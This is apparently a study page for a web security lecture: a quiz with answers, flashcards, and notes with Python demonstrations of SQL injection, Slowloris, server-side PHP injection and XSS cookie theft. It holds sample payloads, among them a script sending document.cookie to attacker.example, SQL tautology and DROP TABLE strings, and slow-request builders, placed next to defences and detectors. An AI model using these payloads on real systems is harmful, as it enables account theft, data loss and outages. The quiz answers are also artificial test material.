Web Security Overview Quiz
41 Questions

Questions and Answers

Which of the following languages is NOT mentioned as part of the web security resources?

  • JavaScript
  • Java (correct)
  • PHP
  • Python

Web security only concerns static content and does not involve dynamic content.

False (B)

What middleware is frequently used to analyze URLs and compose web pages for Apache and MySQL?

PHP scripts

The _____ attack involves exploiting vulnerabilities in web applications through client-side scripts.

XSS

Match the following web security terms with their descriptions:

  • XSS = Cross-Site Scripting that injects malicious scripts
  • SQL Injection = Manipulating SQL queries for unauthorized access
  • Slowloris Attack = Overloading a server by opening many connections
  • mod-security = A web application firewall for securing web applications

What is typically required for a web server to create dynamic content?

Connection to a database server (D)

Cookies can be utilized by attackers in XSS attacks to steal user information.

True (A)

What is the first step to execute the CGI script WealthTracker.cgi?

Fire up the Apache web server (B)

The WealthTracker.html file is supposed to send data back to the server.

False (B)

What does the command 'var cookie_info = document.cookie' do?

It reads the cookies the page's JavaScript is allowed to see into the variable cookie_info (cookies flagged HttpOnly are not included).

Heap spraying fills up memory with _____ bytes referred to as nop-sled.

no-op

Match the following steps of the Heap Spray Exploit with their descriptions:

  • Step 1 = Fill memory with no-op bytes
  • Step 2 = Place malicious shell-executable code after the no-op bytes
  • Step 3 = Trigger a dereference of a memory location that falls inside the sprayed no-op region
  • Step 4 = Execute arbitrary shell code

What could potentially allow malicious attacks on a server when a user submits their credentials?

URL sent in clear text (C)

SQL injection attacks can only occur when input fields are not properly validated.

True (A)

What is the purpose of the PHP package 'php7.0-mysql'?

To allow PHP scripts to connect to MySQL databases.

The MySQL database used in the example is named __________.

Manager_db

Match the following terms with their descriptions:

  • PDO = PHP Data Objects for database connections
  • SQL Injection = Attack to manipulate SQL queries
  • row-level security = Restricts access to rows in a database table
  • localhost.localdomain = Hostname in email headers indicating the mail was handed off by a locally configured machine without a resolvable hostname

How many accounts are created in the MySQL database for user access?

Three (C)

The presence of 'localhost.localdomain' in an email header can indicate it originated from a residential IP block.

True (A)

What action does the visitor take after filling out the form in RetrieveFromMySQL.html?

The visitor clicks the 'Submit' button.

When accessing the Maintenance_Schedule table, users can only view __________.

their own row

What type of web server works with the MySQL database in the mentioned example?

Apache (D)

What is the primary goal of the XSS attack with server-side injection described?

To cause a spam file to be downloaded (C)

The injected PHP code will be visible to clients when they view the page source in their browser.

False (B)

What is the IP address of the Web Hosting Service Provider?

192.168.1.105

The service that handles sending emails on the server is called ______.

Sendmail

Match the following entities with their associated IP addresses:

  • Web Hosting Service Provider = 192.168.1.105
  • Innocent Client = 192.168.1.103

Which of the following operating systems does the web hosting service provider use?

Ubuntu 10.04 (A)

The innocent client's web browser is Internet Explorer.

False (B)

What file is created by the uploadfile.php script?

A file identical to what the client uploaded, except for extra PHP code

The upload page provided to clients is called ______.

UploadYourWebPage.html

What is a major enabler of SQL injection exploits?

Using the GET method for form submission (A)

SQL injection can enable a user to delete all tables in a database.

True (A)

What does PDO stand for in the context of database security?

PHP Data Objects

The Slowloris Attack can potentially bring down a web server due to insufficient _____ available to it.

concurrency

Match the following SQL concepts with their descriptions:

  • SQL Injection = Exploiting vulnerabilities to manipulate database queries
  • GET method = Form submission that leaks sensitive data through the URL
  • PDO = A PHP extension for secure database interactions
  • Slowloris Attack = Holding many TCP connections open with incomplete HTTP requests to exhaust server resources

What command can a user input to potentially delete all tables in the database?

nothing; DROP TABLE *; (B)

A Slowloris attack sends complete requests to a web server.

False (B)

Who authored the Slowloris attack?

Robert Hansen

A TCP connection established during a Slowloris attack is kept open until it _____ .

times out

What is the main reason SQL Injection exploits are successful?

SQL syntax treating commands and data equally (B)

Flashcards

XSS (Cross-Site Scripting) attack

A web attack in which malicious JavaScript is injected into content a web server delivers, so that it runs in victims' browsers under that site's origin and can act on their behalf.

Dynamic Content Creation and Web Servers

A web server's dynamic content creation often relies on data retrieved from a database, handled by 'middleware' like PHP scripts that analyze URLs and assemble web pages.

Middleware

The software or process that bridges between a web server and its associated database, managing data retrieval and page composition.

SQL Injection

A vulnerability that could expose web server data or lead to compromised user accounts by manipulating queries sent to the database.

Slowloris attack

A denial-of-service attack that opens many connections to a web server and feeds each one an HTTP request so slowly that it never completes, tying up the server's connection slots so legitimate clients cannot be served.

mod-security Module

A web server security module (mod_security) analyzes incoming requests for malicious patterns, helping prevent attacks like XSS and SQL injection.

Client-Side XSS

Injecting script that executes in the victim's browser under the vulnerable site's origin, so the attacker can read or act on whatever that page can (cookies, DOM contents, same-origin requests) without breaching the server itself.

Server-side XSS

The lecture's name for injecting PHP into files handled by a server-side script, exploiting the application's handling of user-supplied data (here, uploaded pages). Strictly speaking this is server-side code injection rather than cross-site scripting: the injected code runs on the server, not in a browser.

Server-side XSS Goal

The goal of this attack is to send spam emails silently to a list of email addresses without the user's knowledge.

Code Injection Location

The malicious PHP code is injected into the web page on the server, before it is sent to the user's browser. This makes the code invisible to the user.

PHP Execution

PHP code is executed on the server before the page is sent to the browser, making it impossible for the user to see the injected code in the page source.

UploadYourWebPage.html

An HTML file used by the web hosting provider to allow clients to upload their web pages.

uploadfile.php

The PHP script that processes a client's upload. It writes the uploaded page back with extra PHP code added; that code runs whenever the modified page is later served, not at upload time.

sendmail

A tool for sending emails, likely accessed through the injected PHP code.

Spam File

This file contains a list of email addresses and content for emails to be sent.

mail.log

A log file that records email activity on the server, including sent and received emails.

Blocking emails from residential IP ranges

A security measure where organizations prevent emails from specific IP address ranges associated with residential units. This aims to mitigate spam and phishing attempts originating from residential networks.

Blocking "localhost.localdomain" in email headers

A security measure where organizations reject mail whose Received headers carry the hostname "localhost.localdomain". That value appears when the sending machine's mail software has no properly configured, resolvable hostname, which is typical of misconfigured or home machines rather than of legitimate mail servers, so its presence is used as a spam heuristic.

SQL Injection Attack

A type of attack where malicious code is injected into a web application's input fields to manipulate database queries. The injected code can be used to access or modify sensitive data.

MySQL with row-level security

In the example, each operator can read and modify only their own row of the Maintenance_Schedule table. MySQL has no built-in row-level security policies (PostgreSQL does); the restriction comes from the per-operator accounts and the query the application issues on their behalf.

PHP

A server-side scripting language, run here as an Apache module, that generates dynamic content and talks to the database; it is what makes the example sites interactive.

MySQL

A database management system used to store and manage data in a relational database. It is commonly used with PHP to power dynamic websites.

PDO (PHP Data Objects)

A PHP extension that gives scripts a uniform API for MySQL and other databases through per-database drivers. Its prepared statements with bound parameters keep user data out of the SQL text, which is the standard defense against SQL injection.

RetrieveFromMySQL.html

An HTML page that allows users to enter their MySQL username and password. This form data is then processed by a server-side script (RetrieveFromMySQL.php).

RetrieveFromMySQL.php

A server-side script (PHP) that handles the user credentials submitted by the RetrieveFromMySQL.html form. It attempts to retrieve data from the MySQL database based on the provided username and password.

Testing for vulnerabilities (SQL injection)

A technique used to test the security of a web application. Adversaries use different values in URLs to identify potential vulnerabilities and exploit them.

Heap Spray Exploit

A technique for running attacker-supplied machine code in a web browser. JavaScript allocates many large heap blocks, each consisting mostly of no-op instructions (a nop sled) followed by the shellcode. A separate memory-corruption bug in the browser then redirects execution to an address the attacker guessed; with most of the heap sprayed, that address almost certainly lands in a sled, which slides execution into the shellcode.

XSS (Cross-Site Scripting) for Stealing Cookies

A type of cyberattack that uses malicious JavaScript code injected into a website to steal user cookies. This allows the attacker to impersonate the user and access their online accounts.

WealthTracker.cgi

A CGI script that keeps track of the user's visits and wealth changes. It is vulnerable to XSS because it echoes user-supplied input back into the page it returns without encoding it, so injected script runs in the visitor's browser.

engineering.purdue.edu Web Server

A web server that hosts a CGI script called "Collector.cgi." This script collects and stores data sent to it via the "msg" parameter in a file called "collections.txt."

Nop-Sled

No-operation (nop) bytes used to fill the sprayed heap blocks. Because every nop simply advances to the next instruction, execution landing anywhere in the sled runs down into the shellcode placed at its end; the sled makes the exact landing address irrelevant.

GET Method Vulnerability for Form Submissions

Submitting a form with GET puts every field into the URL, where it shows up in browser history, proxy and server logs and is trivial to edit by hand, which makes probing for SQL injection easy. Switching to POST does not fix injection, though: POST bodies are just as attacker-controlled, and the real fix is parameterized queries.

User Input Filtering

Validating and filtering user input before it reaches a database reduces exposure to SQL injection, but on its own it is fragile. The dependable defense is to keep data out of the query text altogether with prepared statements and bound parameters, with input validation and least-privilege database accounts as additional layers.

ClientSocketFetchDocs.py

A Python script that simulates a legitimate GET request, sending a completed query to a web server, demonstrating the expected behavior of a normal HTTP request.

netstat

A command-line utility used to monitor and display network connection information, including active TCP connections, for analyzing server activity. Can be used to identify signs of a Slowloris attack.

PDO (PHP Data Objects) Database Driver

A specific type of database driver, designed specifically for PHP, providing a standard interface for communicating with various database systems and offering enhanced security against SQL injection vulnerabilities.

Study Notes

Lecture 08: Web Security

  • The lecture focuses on web security, covering issues relevant to web servers, browsers, and user interactions.
  • Prerequisites for the lecture include URL, HTTP, and HTML knowledge.
  • Software like Apache2 web server, PHP7, MySQL, and sendmail are required.
  • Programming languages such as PHP, Perl, Python, JavaScript, and CGI scripts are used in web development.
  • Resources for further study include PHP comparisons, manuals, tutorials, MySQL documentation, PDO tutorials, Modsecurity projects, JavaScript tutorials, and OWASP resources for application security.
  • Topics outlined include XSS attacks (server-side injection), SQL injection attacks, Slowloris attacks, mod-security, client-side XSS, cookie theft using XSS, and heap spray exploits.

Prerequisites

  • URL, HTTP, and HTML knowledge are needed.
  • Apache2 web server installed on an Ubuntu machine.
  • Apache2 server is enabled with PHP7.
  • MySQL database management system used as database backend.
  • A driver to enable PHP communication with MySQL.
  • Sendmail program running on the server.

Languages

  • PHP
  • Perl
  • MySQL
  • Python
  • JavaScript
  • CGI scripts

Resources

  • PHP vs. NodeJS comparison and benchmarks (2018)
  • PHP Manual
  • PHP Tutorial
  • MySQL Documentation
  • PDO tutorials (addressing PHP delusions)
  • Modsecurity Project
  • JavaScript Tutorial
  • OWASP Foundation (Open Source Foundation for Application Security)

Outline

  • XSS attack with server-side injection
  • SQL Injection Attack
  • Slowloris Attack
  • mod-security
  • Client-side XSS
  • Cookies and XSS for stealing cookies
  • Heap Spray Exploit

Web Security

  • Web security addresses issues specific to how web servers display content to browsers, how browsers interact with servers, and how users interact with browsers.
  • In the early World Wide Web, servers offered only static content.
  • Now, dynamic content is common, often tied to a database server.
  • Middleware (often PHP scripts) is frequently used for this purpose, particularly with Apache and MySQL.

XSS Attack with Server-Side Injection

  • This type of attack injects malicious code, often PHP, during upload processes.
  • The injected code is not visible in the page source shown by a browser: PHP runs on the server, and only its output reaches the client.
  • The goal might be to download a spam file from a third-party source as soon as the page loads.
  • A diagram illustrates the attack flow, showing the attacker's web hosting provider injecting the script into the web pages uploaded by users.

XSS Attack with Server-Side Injection (Details)

  • Specific details are provided about the web servers, clients, and email providers involved.
  • Example code snippets showing the injected PHP code demonstrate how the attack works.
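
The lecture describes the served file as identical to the upload except for extra PHP code. Because PHP executes before the page leaves the server, fetching the page in a browser would never reveal it; but a hosting client who can retrieve the stored file itself (over the same upload channel, for instance) can diff it against the local copy. The following is an added example, not the lecture's uploadfile.php or injected code: both page bodies are constructed, and the mail() loop stands in for whatever the lecture's injected block does.

```python
# Added example (not from the lecture): detect PHP injected into an uploaded
# HTML page by diffing the stored file against the original upload.
import difflib
import re

# Constructed: what the client uploaded.
ORIGINAL_UPLOAD = """<html>
<head><title>My Page</title></head>
<body>
<h1>Hello from my page</h1>
</body>
</html>
"""

# Constructed: the same file as stored on the provider after the upload
# handler added its block. The mail() loop is a stand-in, not the lecture's code.
SERVED_PAGE = """<html>
<head><title>My Page</title></head>
<body>
<h1>Hello from my page</h1>
<?php
  foreach (file('/tmp/spam_list.txt') as $addr) { mail(trim($addr), 'Hi', 'spam body'); }
?>
</body>
</html>
"""

# Matches <?php ... ?>, <?= ... ?> and short <? ... ?> blocks, across lines.
PHP_BLOCK = re.compile(r"<\?(?:php|=)?.*?\?>", re.DOTALL | re.IGNORECASE)


def php_blocks(page):
    """Return every PHP block in the page. A client who uploaded pure HTML
    should get an empty list back; anything else was added server-side."""
    return PHP_BLOCK.findall(page)


def injected_lines(original, served):
    """Lines present in the stored file but not in the original upload."""
    diff = difflib.unified_diff(original.splitlines(), served.splitlines(),
                                lineterm="", n=0)
    return [line[1:] for line in diff
            if line.startswith("+") and not line.startswith("+++")]


def tampered(original, served):
    """True when the stored file contains anything the client did not upload."""
    return bool(injected_lines(original, served))


if __name__ == "__main__":
    print("PHP blocks in upload :", php_blocks(ORIGINAL_UPLOAD))
    print("PHP blocks in stored :", php_blocks(SERVED_PAGE))
    for line in injected_lines(ORIGINAL_UPLOAD, SERVED_PAGE):
        print("injected:", line)
    print("tampered:", tampered(ORIGINAL_UPLOAD, SERVED_PAGE))
```

The same two functions work as a provider-side integrity check: hash or diff every client file against the copy recorded at upload time, and treat any PHP block appearing in a file that was uploaded as plain HTML as a sign of compromise.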

SQL Injection Attack

  • PHP and MySQL work together to manage web server databases. The "php7.0-mysql" package allows for direct database connections via a PHP Data Objects (PDO) based driver.
  • A MySQL database (Manager_db) with user accounts (Operator1, Operator2, Operator3) and a Maintenance_Schedule table are set up for illustration.
  • The initial table setup shows each operator's schedules relating to specific equipment.

SQL Injection Attack (Details)

  • An attacker could supply input that modifies or deletes data, up to dropping tables. (The lecture's illustrative payload, nothing; DROP TABLE *;, relies on stacked statements; MySQL's DROP TABLE needs explicit table names, and the operator's account would also need the DROP privilege.)
  • The root cause is that when a query is assembled by string concatenation, SQL cannot tell attacker-supplied data from the command text: both are just characters in one string.

Security against SQL Injection

  • Prevention means keeping user input out of the query text: use prepared statements with bound parameters, validate input as a secondary check, and give each database account only the privileges its queries need.
  • PDO (PHP Data Objects) based drivers offer a consistent API across diverse database systems, and their prepared statements (PDO::prepare with bound parameters) are the built-in protection against SQL injection.
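
The injection and the fix described above, as an added example that is not the lecture's PHP/MySQL code: it rebuilds the Operator1 / Maintenance_Schedule scenario on Python's built-in sqlite3 so it runs offline. The column names, the row contents and the `' OR '1'='1` payload are constructed for the demo; only the table and account names come from the lecture. The parameterized query plays the role of a PDO prepared statement.

```python
# Added example (not from the lecture): SQL injection by string concatenation
# versus a parameterized query, on an in-memory sqlite3 stand-in for Manager_db.
import sqlite3


def setup_db():
    """Create an in-memory database with one Maintenance_Schedule row per operator.
    Column names and rows are constructed for this demo."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE Maintenance_Schedule ("
        "operator TEXT PRIMARY KEY, equipment TEXT, schedule TEXT)"
    )
    con.executemany(
        "INSERT INTO Maintenance_Schedule VALUES (?, ?, ?)",
        [
            ("Operator1", "pump-A", "Mon 08:00"),
            ("Operator2", "boiler-B", "Tue 09:00"),
            ("Operator3", "valve-C", "Wed 10:00"),
        ],
    )
    return con


def own_row_vulnerable(con, operator):
    """Query text assembled by concatenation: whatever the user typed becomes
    part of the SQL, so quotes and keywords in it are parsed as SQL."""
    sql = ("SELECT operator, equipment, schedule FROM Maintenance_Schedule "
           "WHERE operator = '" + operator + "'")
    return con.execute(sql).fetchall()


def own_row_safe(con, operator):
    """Parameterized query: the driver binds the value, which is never parsed
    as SQL. This is what a PDO prepared statement does on the PHP side."""
    sql = ("SELECT operator, equipment, schedule FROM Maintenance_Schedule "
           "WHERE operator = ?")
    return con.execute(sql, (operator,)).fetchall()


def try_stacked_statement(con, operator):
    """Feed a '; DROP TABLE ...' payload to the vulnerable builder. sqlite3's
    execute() runs exactly one statement and rejects a second one (as
    ProgrammingError in current Python, sqlite3.Warning in older versions);
    an interface that accepts stacked statements would run the DROP."""
    try:
        own_row_vulnerable(con, operator)
        return "executed"
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        return "rejected: multiple statements"


def table_exists(con, name):
    row = con.execute(
        "SELECT count(*) FROM sqlite_master WHERE type='table' AND name=?", (name,)
    ).fetchone()
    return row[0] == 1


if __name__ == "__main__":
    db = setup_db()
    print("legit     :", own_row_safe(db, "Operator1"))
    tautology = "Operator1' OR '1'='1"        # classic always-true payload
    print("vulnerable:", own_row_vulnerable(db, tautology))  # every operator's row
    print("safe      :", own_row_safe(db, tautology))        # no such operator
    drop = "x'; DROP TABLE Maintenance_Schedule; --"
    print("stacked   :", try_stacked_statement(db, drop),
          "| table still there:", table_exists(db, "Maintenance_Schedule"))
```

Two points carry over to the MySQL setup in the lecture: the tautology works against any concatenated query regardless of the database, and whether a stacked `DROP TABLE` runs depends on the database API, so the per-operator MySQL accounts should hold only SELECT (and whatever the application genuinely needs) so that even a successful injection cannot drop anything.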

Kak's Code (Lecture 27)

  • Specific file names (RetrieveFromMySQL.html, RetrieveFromMySQL.php) are listed for code.

The Slowloris Attack

  • Developed by Robert Hansen in 2009.
  • The attack involves sending incomplete HTTP requests to a web server.
  • Each such connection occupies one of the server's limited worker slots until it times out; once they are all taken, legitimate clients cannot be served.

The Slowloris Attack: Example 1, 2, and 3

  • Illustrations of client-side scripts (ClientSocketFetchDocs.py, TestHTTPServerWithNoCRLF.py) and server-side scripts (CheckNetstat.sh, RepeatedAttack.sh, TerminateLoris.sh) used in the attack demonstrate the attack's method.

SlowPost Attack

  • Similar to Slowloris but with POST: the headers are sent complete, announcing a large Content-Length, and the body is then trickled in a byte at a time, so the server waits for the body instead of for the end of the headers.
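
What Slowloris and Slow POST put on the wire, and the netstat-based check a server administrator runs, as an added example. It is not the lecture's ClientSocketFetchDocs.py or CheckNetstat.sh: the host names, the remote IP addresses and the netstat output below are constructed for the demo (192.168.1.105 is reused from the lecture as the server).

```python
# Added example (not from the lecture): Slowloris / Slow POST request shapes and
# a parser for `netstat -ant` output that flags peers hoarding connections.
from collections import Counter

CRLF = "\r\n"


def slowloris_request(host, path="/"):
    """Request line and a couple of headers, but no terminating blank line,
    so the server keeps waiting for the rest of the headers."""
    return (f"GET {path} HTTP/1.1{CRLF}"
            f"Host: {host}{CRLF}"
            f"User-Agent: Mozilla/5.0{CRLF}").encode()


def keepalive_header(n):
    """What Slowloris dribbles out every few seconds: one more harmless header,
    still without the blank line that would complete the request."""
    return f"X-a: {n}{CRLF}".encode()


def slowpost_request(host, path="/", content_length=1_000_000):
    """Slow POST variant: the headers ARE complete, but they promise a huge
    body that is then trickled a byte at a time (see trickle_body)."""
    return (f"POST {path} HTTP/1.1{CRLF}"
            f"Host: {host}{CRLF}"
            f"Content-Type: application/x-www-form-urlencoded{CRLF}"
            f"Content-Length: {content_length}{CRLF}{CRLF}").encode()


def trickle_body(n_bytes):
    """Yield the POST body one byte per send; the server's worker stays blocked
    reading until Content-Length bytes arrive or a timeout fires."""
    for _ in range(n_bytes):
        yield b"a"


def headers_complete(buf):
    """Server-side view: the request headers are complete only once the empty
    line (CRLF CRLF) has arrived."""
    return b"\r\n\r\n" in buf


# Constructed `netstat -ant` sample: 10.0.0.9 holds four connections to port 80.
SAMPLE_NETSTAT = """Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.105:80        10.0.0.9:51234          ESTABLISHED
tcp        0      0 192.168.1.105:80        10.0.0.9:51235          ESTABLISHED
tcp        0      0 192.168.1.105:80        10.0.0.9:51236          ESTABLISHED
tcp        0      0 192.168.1.105:80        10.0.0.9:51237          ESTABLISHED
tcp        0      0 192.168.1.105:80        192.168.1.103:40001     ESTABLISHED
tcp        0      0 192.168.1.105:22        192.168.1.103:40002     ESTABLISHED
tcp        0      0 192.168.1.105:80        192.168.1.77:40003      TIME_WAIT
"""


def established_by_peer(netstat_output, local_port=80):
    """Count ESTABLISHED connections to local_port per remote IP address."""
    counts = Counter()
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] not in ("tcp", "tcp6"):
            continue
        local, foreign, state = fields[3], fields[4], fields[5]
        if state != "ESTABLISHED" or local.rsplit(":", 1)[1] != str(local_port):
            continue
        counts[foreign.rsplit(":", 1)[0]] += 1
    return counts


def suspicious_peers(netstat_output, local_port=80, threshold=3):
    """Remote addresses holding at least `threshold` connections open at once:
    the footprint a Slowloris client leaves in netstat."""
    return sorted(ip for ip, n in established_by_peer(netstat_output, local_port).items()
                  if n >= threshold)


if __name__ == "__main__":
    req = slowloris_request("192.168.1.105")
    print(req)
    print("complete?", headers_complete(req))
    print("complete after keepalive?", headers_complete(req + keepalive_header(1)))
    print("complete after blank line?", headers_complete(req + CRLF.encode()))
    print(dict(established_by_peer(SAMPLE_NETSTAT)))
    print("suspicious:", suspicious_peers(SAMPLE_NETSTAT))
```

The reason the attack works against a default Apache is that each connection occupies a worker until the request completes or times out, and the default timeout is long. Apache's mod_reqtimeout directive `RequestReadTimeout header=20-40,MinRate=500 body=20,MinRate=500` bounds how long a client may take to deliver headers and body (extending the window only while data keeps arriving), which defeats both the GET and the POST variants; limiting connections per source address is the other usual layer.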

Kak's Code (Lecture 28)

  • Specific file names (WealthTracker.html) for the relevant code are listed.

XSS for Stealing Cookies

  • Third parties can steal cookies via XSS attacks. JavaScript is used in these attacks.

  • Example steps for a cookie-stealing attack are given, showing how to bring up the JavaScript console, and the required commands are illustrated to steal cookies.

  • A CGI script named Collector.cgi on the attacker's server receives the stolen cookies (via its msg parameter) and stores them.
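
The cookie-theft flow described above, as an added example that is not the lecture's WealthTracker.cgi, Collector.cgi or console commands: a minimal model of a CGI page that echoes a request parameter, the payload that would ship document.cookie to a collector, and the two fixes (output encoding, and HttpOnly so that document.cookie has nothing to steal). The collector host attacker.example and the cookie value are constructed; only the Collector.cgi name and its msg parameter come from the lecture.

```python
# Added example (not from the lecture): reflected XSS carrying document.cookie to
# a collector, and the two defenses that break it.
import html
from http.cookies import SimpleCookie

# The kind of payload an attacker plants in the reflected parameter: it requests
# an "image" from the collector with the victim's cookies in the query string.
# attacker.example is a constructed host name.
COOKIE_STEALER = ("<script>new Image().src='http://attacker.example/Collector.cgi?msg='"
                  "+encodeURIComponent(document.cookie);</script>")


def render_wealth_page(visitor_name, escape_output):
    """Model of the CGI response. With escape_output=False the parameter is
    interpolated verbatim (reflected XSS); with True it is HTML-escaped so the
    browser shows the payload as text instead of running it."""
    shown = html.escape(visitor_name, quote=True) if escape_output else visitor_name
    return ("<html><body>"
            f"<h1>Wealth Tracker</h1><p>Welcome back, {shown}!</p>"
            "</body></html>")


def page_runs_script(page):
    """Demo-only check: does the rendered page contain a live <script> element?"""
    return "<script" in page.lower()


def session_cookie_header(session_id, http_only=True):
    """Build the Set-Cookie header for the session. HttpOnly removes the cookie
    from document.cookie entirely, so even a successful XSS cannot read it;
    Secure and SameSite are the usual companions."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["path"] = "/"
    jar["session"]["secure"] = True
    jar["session"]["httponly"] = http_only
    jar["session"]["samesite"] = "Lax"
    return jar.output(header="Set-Cookie:")


if __name__ == "__main__":
    vulnerable = render_wealth_page(COOKIE_STEALER, escape_output=False)
    hardened = render_wealth_page(COOKIE_STEALER, escape_output=True)
    print("vulnerable page runs script:", page_runs_script(vulnerable))
    print("hardened page runs script:  ", page_runs_script(hardened))
    print(session_cookie_header("c0ffee"))
```

Output encoding is the fix for the injection itself; HttpOnly is defense in depth, since script that still runs on the page can do other things (forge requests with the victim's session, read the DOM) even when it cannot read the cookie.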

The Heap Spray Exploit

  • This exploit uses JavaScript to fill the browser's heap with many copies of a nop sled followed by shellcode, so that a memory-corruption bug in the browser that redirects execution to a guessed heap address ends up running the shellcode.

Heap Spray References

  • References to documentation on the heap spray technique are provided.

Web Vulnerabilities

  • Historical security issues in browser-server interaction (e.g., the 2005 Samy worm, which spread through MySpace profiles via stored XSS).

Browser Vulnerabilities

  • Vulnerabilities arising from JavaScript's access to the DOM (Document Object Model) are discussed.
  • Embedding another web page inside the target page with an <iframe> is covered as a further attack vector.

Web Application Security

  • The OWASP (Open Web Application Security Project) is mentioned as a notable resource.
  • Tools like w3af for testing web applications for vulnerabilities (SQL injection, cross-site scripting, remote file inclusion) are discussed.

Reference

  • A PDF file reference (for subverting AJAX) is listed.

Description

Test your knowledge on web security concepts, including dynamic content, common attacks, and functionalities of web servers. This quiz covers various critical topics about safeguarding web applications and understanding vulnerabilities. Challenge yourself with matching terms and answering specific questions!
